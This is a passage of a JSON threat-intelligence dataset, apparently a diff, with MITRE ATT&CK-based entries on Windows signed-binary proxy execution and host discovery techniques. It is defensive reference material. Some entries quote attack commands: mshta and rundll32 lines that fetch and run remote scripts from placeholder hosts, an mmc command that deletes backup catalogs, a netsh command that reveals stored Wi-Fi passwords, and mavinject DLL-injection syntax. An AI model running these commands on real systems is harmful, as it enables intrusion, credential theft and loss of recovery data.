InstallUtil](https://app.tidalcyber.com/references/54d962fc-4ca6-4f5f-b383-ec87d711a764)] The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. [[LOLBAS Installutil](https://app.tidalcyber.com/references/7dfb2c45-862a-4c25-a65a-55abea4b0e44)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1218.004" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "9ca43902-5632-43e9-9dc1-84a8eafe44bd", + "value": "InstallUtil" + }, + { + "description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).[[LOLBAS Mavinject](https://app.tidalcyber.com/references/4ba7fa89-006b-4fbf-aa6c-6775842c97a4)]\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://app.tidalcyber.com/technique/232bb95b-a267-4cc2-8eb1-67ecdd5babd5)), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL).[[ATT Lazarus TTP Evolution](https://app.tidalcyber.com/references/594c59ff-c4cb-4164-a62d-120e282b2538)][[Reaqta Mavinject](https://app.tidalcyber.com/references/5c0e0c84-2992-4098-8913-66a20ca61bf4)] Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://app.tidalcyber.com/technique/232bb95b-a267-4cc2-8eb1-67ecdd5babd5), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.[[Mavinject Functionality Deconstructed](https://app.tidalcyber.com/references/17b055ba-5e59-4508-ba77-2519c03c6d65)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1218.013" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "766dd13c-6ee1-41da-81cd-a22a27d68103", + "value": "Mavinject" + }, + { + "description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.[[win_mmc](https://app.tidalcyber.com/references/508373ef-2634-404f-99de-7a73cce68699)][[what_is_mmc](https://app.tidalcyber.com/references/57e130ab-f981-423e-bafe-51d0d0e1abdf)] MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.[[win_msc_files_overview](https://app.tidalcyber.com/references/81aa896a-3498-4c37-8882-2b77933b71a8)]\n\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode.[[win_mmc](https://app.tidalcyber.com/references/508373ef-2634-404f-99de-7a73cce68699)] Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. \n\nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://app.tidalcyber.com/technique/d207c03b-fbe7-420e-a053-339f4650c043)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).[[win_wbadmin_delete_catalog](https://app.tidalcyber.com/references/6adfba35-3bf1-4915-813e-40c4a843ae34)][[phobos_virustotal](https://app.tidalcyber.com/references/929dbb22-34a5-4377-95dd-9e240ecb343a)]\n\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) class object.[[win_clsid_key](https://app.tidalcyber.com/references/239bb629-2733-4da3-87c2-47a7ab55433f)] Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.[[mmc_vulns](https://app.tidalcyber.com/references/7bcf1c90-6299-448b-92c3-a6702882936a)] Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc.[[abusing_com_reg](https://app.tidalcyber.com/references/7f0f223f-09b1-4f8f-b6f1-1044e2ac7066)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1218.014" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "43c2f853-cb52-4242-94e9-ec53743f3c05", + "value": "MMC" + }, + { + "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code [[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)] [[Red Canary HTA Abuse Part Deux](https://app.tidalcyber.com/references/39b1cb2f-a07b-49f2-bf2c-15f0c9b95772)] [[FireEye Attacks Leveraging HTA](https://app.tidalcyber.com/references/1876a476-b2ff-4605-a78b-89443d21b063)] [[Airbus Security Kovter Analysis](https://app.tidalcyber.com/references/a8420828-9e00-45a1-90d7-a37f898204f9)] [[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)] \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. [[Wikipedia HTML Application](https://app.tidalcyber.com/references/f1f76055-91f8-4977-9392-bed347e4f181)] HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. [[MSDN HTML Applications](https://app.tidalcyber.com/references/2de103a8-8d72-40f9-b366-b908364dd090)]\n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. [[LOLBAS Mshta](https://app.tidalcyber.com/references/915a4aef-800e-4c68-ad39-df67c3dbaf75)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1218.005" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "d54c50df-3cb8-4fff-86c4-ae5be57937ad", + "value": "Mshta" + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).[[Microsoft msiexec](https://app.tidalcyber.com/references/028a8dc6-08f6-4660-8b82-9d5483d15f72)] The Msiexec.exe binary may also be digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.[[LOLBAS Msiexec](https://app.tidalcyber.com/references/996cc7ea-0729-4c51-b9c3-b201ec32e984)][[TrendMicro Msiexec Feb 2018](https://app.tidalcyber.com/references/768c99f3-ee28-47dc-bc33-06d50ac72dea)] Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.[[Microsoft AlwaysInstallElevated 2018](https://app.tidalcyber.com/references/19026f4c-ad65-435e-8c0e-a8ccc9895348)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1218.007" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "95ea2f53-b6c8-4f85-a3f7-528eeadd3c48", + "value": "Msiexec" + }, + { + "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.[[Microsoft odbcconf.exe](https://app.tidalcyber.com/references/9df74876-2abf-4ced-b986-36212225d795)] The Odbcconf.exe binary may be digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). [[LOLBAS Odbcconf](https://app.tidalcyber.com/references/febcaaec-b535-4347-a4c7-b3284b251897)][[TrendMicro Squiblydoo Aug 2017](https://app.tidalcyber.com/references/efeb475c-2a7c-4ab6-814d-3ee7866fa322)][[TrendMicro Cobalt Group Nov 2017](https://app.tidalcyber.com/references/81847e06-fea0-4d90-8a9e-5bc99a2bf3f0)] \n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1218.008" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "ba8d0fed-e500-4060-9d31-277b7e4411fb", + "value": "Odbcconf" + }, + { + "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. [[MSDN Regsvcs](https://app.tidalcyber.com/references/4f3651df-159e-4006-8cb6-de0d0712a194)] [[MSDN Regasm](https://app.tidalcyber.com/references/66a3de54-4a16-4b1b-b18f-e3842aeb7b40)]\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. [[LOLBAS Regsvcs](https://app.tidalcyber.com/references/3f669f4c-0b94-4b78-ad3e-fd62f7600902)][[LOLBAS Regasm](https://app.tidalcyber.com/references/b6a3356f-72c2-4ec2-a276-2432eb691055)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1218.009" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "a54c7c35-b70d-42b2-aa9d-5ffd9f792fff", + "value": "Regsvcs/Regasm" + }, + { + "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. [[Microsoft Regsvr32](https://app.tidalcyber.com/references/723ec577-5ea8-4ced-b6c3-b7aaabe1d7e8)]\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. [[LOLBAS Regsvr32](https://app.tidalcyber.com/references/8e32abef-534e-475a-baad-946b6ec681c1)] This variation of the technique is often referred to as a \"Squiblydoo\" and has been used in campaigns targeting governments. [[Carbon Black Squiblydoo Apr 2016](https://app.tidalcyber.com/references/b23fc191-cc84-49c8-9eb0-09db7e23b24d)] [[FireEye Regsvr32 Targeting Mongolian Gov](https://app.tidalcyber.com/references/d1509d15-04af-46bd-a6b1-30fbd179b257)]\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://app.tidalcyber.com/technique/3e1ef5ba-6426-4fe0-ad48-78557667d680). [[Carbon Black Squiblydoo Apr 2016](https://app.tidalcyber.com/references/b23fc191-cc84-49c8-9eb0-09db7e23b24d)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1218.010" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "b1da2b02-9ade-45e0-a795-ec1b19e5316a", + "value": "Regsvr32" + }, + { + "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://app.tidalcyber.com/technique/8941d1f4-d80c-4aaa-821a-a059c2a0f854)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can also be used to execute [Control Panel](https://app.tidalcyber.com/technique/b5cc9ab3-6501-4c50-904e-1a25a4088125) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. [[Trend Micro CPL](https://app.tidalcyber.com/references/d90a33aa-8f20-49cb-aa27-771249cb65eb)]\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. [[This is Security Command Line Confusion](https://app.tidalcyber.com/references/49a21bba-b77d-4b0e-b666-20ef2826e92c)]\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.[[Attackify Rundll32.exe Obscurity](https://app.tidalcyber.com/references/daa35853-eb46-4ef4-b543-a2c5157f96bf)][[Github NoRunDll](https://app.tidalcyber.com/references/72d4b682-ed19-4e0f-aeff-faa52b3a0439)] DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).\n\nAdditionally, adversaries may use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.[[rundll32.exe defense evasion](https://app.tidalcyber.com/references/0f31f0ff-9ddb-4ea9-88d0-7b3b688764af)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1218.011" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "5652575d-cdb9-44ef-9c32-fff038f15444", + "value": "Rundll32" + }, + { + "description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.[[WinOSBite verclsid.exe](https://app.tidalcyber.com/references/5d5fa25b-64a9-4fdb-87c5-1a69a7d2f874)]\n\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.[[LOLBAS Verclsid](https://app.tidalcyber.com/references/63ac9e95-aad8-4735-9e63-f45d8c499030)][[Red Canary Verclsid.exe](https://app.tidalcyber.com/references/f64e934f-737d-4461-8158-ae855bc472c4)][[BOHOPS Abusing the COM Registry](https://app.tidalcyber.com/references/3b5c0e62-7ac9-42e1-b2dd-8f2e0739b9d7)][[Nick Tyrer GitHub](https://app.tidalcyber.com/references/f4f89926-71eb-4130-a644-8240d2bab721)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1218.012" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "e8eb0242-9972-4c8b-af89-7731065d79f8", + "value": "Verclsid" + }, + { + "description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.[[LOLBAS Project](https://app.tidalcyber.com/references/14b1d3ab-8508-4946-9913-17e667956064)] Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.\n\nSimilarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.[[split man page](https://app.tidalcyber.com/references/3a4dc770-8bfa-44e9-bb0e-f0af0ae92994)][[GTFO split](https://app.tidalcyber.com/references/4b86c8c3-57b0-4558-be21-f928acb23f49)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "581c5073-4236-4c45-b8fc-37ae2dfbb65f", + "type": "similar" + }, + { + "dest-uuid": "b5c7edc6-0cc7-4c57-b39f-3b0474433889", + "type": "similar" + }, + { + "dest-uuid": "b5cc9ab3-6501-4c50-904e-1a25a4088125", + "type": "similar" + }, + { + "dest-uuid": "9ca43902-5632-43e9-9dc1-84a8eafe44bd", + "type": "similar" + }, + { + "dest-uuid": "766dd13c-6ee1-41da-81cd-a22a27d68103", + "type": "similar" + }, + { + "dest-uuid": "43c2f853-cb52-4242-94e9-ec53743f3c05", + "type": "similar" + }, + { + "dest-uuid": "d54c50df-3cb8-4fff-86c4-ae5be57937ad", + "type": "similar" + }, + { + "dest-uuid": "95ea2f53-b6c8-4f85-a3f7-528eeadd3c48", + "type": "similar" + }, + { + "dest-uuid": "ba8d0fed-e500-4060-9d31-277b7e4411fb", + "type": "similar" + }, + { + "dest-uuid": "a54c7c35-b70d-42b2-aa9d-5ffd9f792fff", + "type": "similar" + }, + { + "dest-uuid": "b1da2b02-9ade-45e0-a795-ec1b19e5316a", + "type": "similar" + }, + { + "dest-uuid": "5652575d-cdb9-44ef-9c32-fff038f15444", + "type": "similar" + }, + { + "dest-uuid": "e8eb0242-9972-4c8b-af89-7731065d79f8", + "type": "similar" + } + ], + "uuid": "4060ad55-7ff1-4127-acad-808b2bc77655", + "value": "System Binary Proxy Execution" + }, + { + "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://app.tidalcyber.com/software/cecea681-a753-47b5-9d77-c10a5b4403ab) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather detailed system information (e.g. show version).[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)] [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.[[OSX.FairyTale](https://app.tidalcyber.com/references/27f8ad45-53d2-48ba-b549-f7674cf9c2e7)][[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.[[Amazon Describe Instance](https://app.tidalcyber.com/references/c0b6a8a4-0d94-414d-b5ab-cf5485240dee)][[Google Instances Resource](https://app.tidalcyber.com/references/9733447c-072f-4da8-9cc7-0a0ce6a3b820)][[Microsoft Virutal Machine API](https://app.tidalcyber.com/references/f565c237-07c5-4e9e-9879-513627517109)]", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "a2961a00-450e-45a5-b293-f699d9f3b4ea", + "value": "System Information Discovery" + }, + { + "description": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.[[Malware System Language Check](https://app.tidalcyber.com/references/3d4c5366-038a-453e-b803-a172b95da5f7)]\n\nThere are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) and calls to [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.[[CrowdStrike Ryuk January 2019](https://app.tidalcyber.com/references/df471757-2ce0-48a7-922f-a84c57704914)] \n\nFor example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language or parsing the outputs of Windows API functions GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID.[[Darkside Ransomware Cybereason](https://app.tidalcyber.com/references/eded380e-33e9-4fdc-8e1f-b51d650b9731)][[Securelist JSWorm](https://app.tidalcyber.com/references/c29ca9f2-1e48-4913-b10b-15e558868ed8)][[SecureList SynAck Doppelgänging May 2018](https://app.tidalcyber.com/references/d9f0af0f-8a65-406b-9d7e-4051086ef301)]\n\nOn a macOS or Linux system, adversaries may query locale to retrieve the value of the $LANG environment variable.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1614.001" + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "7bebc801-5d5d-44b0-8da2-f37f7d88e40d", + "value": "System Language Discovery" + }, + { + "description": "\nAdversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://app.tidalcyber.com/technique/90e6a093-3e87-4d74-8b68-38c7d7e5e93c) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.[[FBI Ragnar Locker 2020](https://app.tidalcyber.com/references/38b9b8a3-6fd3-4650-9192-14ee3f302705)][[Sophos Geolocation 2016](https://app.tidalcyber.com/references/a3b7540d-20cc-4d94-8321-9fd730486f8c)][[Bleepingcomputer RAT malware 2020](https://app.tidalcyber.com/references/a587ea99-a951-4aa8-a3cf-a4822ae97490)] Windows API functions such as GetLocaleInfoW can also be used to determine the locale of the host.[[FBI Ragnar Locker 2020](https://app.tidalcyber.com/references/38b9b8a3-6fd3-4650-9192-14ee3f302705)] In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.[[AWS Instance Identity Documents](https://app.tidalcyber.com/references/efff0080-59fc-4ba7-ac91-771358f68405)][[Microsoft Azure Instance Metadata 2021](https://app.tidalcyber.com/references/66e93b75-0067-4cdb-b695-8f8109ef26e0)]\n\nAdversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.[[Securelist Trasparent Tribe 2020](https://app.tidalcyber.com/references/0db470b1-ab22-4b67-a858-472e4de7c6f0)][[Sophos Geolocation 2016](https://app.tidalcyber.com/references/a3b7540d-20cc-4d94-8321-9fd730486f8c)]", + "meta": { + "platforms": [ + "IaaS", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + }, + { + "dest-uuid": "7bebc801-5d5d-44b0-8da2-f37f7d88e40d", + "type": "similar" + } + ], + "uuid": "90e6a093-3e87-4d74-8b68-38c7d7e5e93c", + "value": "System Location Discovery" + }, + { + "description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7), tracert, and GET requests to websites.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1016.001" + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "3f926f8f-7b47-4a7d-976a-269704a6bc5c", + "value": "Internet Connection Discovery" + }, + { + "description": "Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3), [Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f), and other discovery or [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) activity to support both ongoing and future campaigns.\n\nAdversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi network’s corresponding password.[[BleepingComputer Agent Tesla steal wifi passwords](https://app.tidalcyber.com/references/93b5ecd2-35a3-5bd8-9d6e-87bace012546)][[Malware Bytes New AgentTesla variant steals WiFi credentials](https://app.tidalcyber.com/references/b61b7db6-ed0d-546d-b1e0-c2630530975b)][[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)] Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.[[Binary Defense Emotes Wi-Fi Spreader](https://app.tidalcyber.com/references/05e624ee-c53d-5cd1-8fd2-6b2d38344bfd)]\n\nOn Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.[[Wi-Fi Password of All Connected Networks in Windows/Linux](https://app.tidalcyber.com/references/7005f62f-0239-56c7-964b-64384e17b8da)] On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).[[Find Wi-Fi Password on Mac](https://app.tidalcyber.com/references/695f3d20-7a46-5a4a-aef0-0a05a5e35304)]\n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1016.002" + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "4c7c0caa-b9bc-5d63-b5c3-812fdf3bba8a", + "value": "Wi-Fi Discovery" + }, + { + "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e), [ipconfig](https://app.tidalcyber.com/software/4f519002-0576-4f8e-8add-73ebac9a86e6)/[ifconfig](https://app.tidalcyber.com/software/93ab16d1-625e-4b1c-bb28-28974c269c47), [nbtstat](https://app.tidalcyber.com/software/81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e), and [route](https://app.tidalcyber.com/software/3b755518-9085-474e-8bc4-4f9344d9c8af).\n\nAdversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface).[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)][[Mandiant APT41 Global Intrusion ](https://app.tidalcyber.com/references/9b75a38e-e5c7-43c8-a7fb-c7f212e00497)]\n\nAdversaries may use the information from [System Network Configuration Discovery](https://app.tidalcyber.com/technique/adb6b8c1-2bdb-42b9-95da-5ce07e8796f7) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + }, + { + "dest-uuid": "3f926f8f-7b47-4a7d-976a-269704a6bc5c", + "type": "similar" + 